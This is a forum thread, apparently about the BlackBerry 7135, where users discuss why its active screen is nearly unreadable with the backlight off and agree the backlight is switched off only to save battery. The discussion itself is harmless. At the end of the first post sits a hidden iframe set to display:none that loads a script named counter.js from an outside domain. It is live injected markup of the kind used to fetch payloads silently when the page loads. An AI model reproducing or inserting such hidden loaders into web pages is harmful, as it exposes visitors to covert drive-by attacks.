+ Reply to Thread

Setting for 7135 Screen

Does anyone know of an internal setting for the screen brightness when the backlight is OFF? This is in addition to the "brightness" and "constrast" settings in preferences.

The screen is almost black when the backlight is off. My 6035 has good contrast in light so that it can be seen easily. But the 7135 I have to be in very bright light to see it at all without the backlight.

I am sure the battery life would improve if the backlight was NOT needed all of the time.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

That is correct. This is an active screen so turning off the backlight causes the screen to not be very visable. There is no way to change that.

It's like turning the brightness all the way off on a LCD panel. You can't see anything after that. Think of this less as a display with a backlight, and more as a TV with brightness.

Originally posted by HoTSynC
    That is correct. This is an active screen so turning off the backlight causes the screen to not be very visable. There is no way to change that.

It's like turning the brightness all the way off on a LCD panel. You can't see anything after that. Think of this less as a display with a backlight, and more as a TV with brightness.
    That is a very good point! I have been wondering if I was missing something in the ability to tun off the backlight since when I do so, it make the display useless in virtually any lighting conditions. It seems to me to be a useless function other than to save battery life.
    Dave

I shut it off in long calls to conserve battery, nothing more.

I do too and I'm o.k. with that.
    ~'kito
    pdaPhoneHome Moderator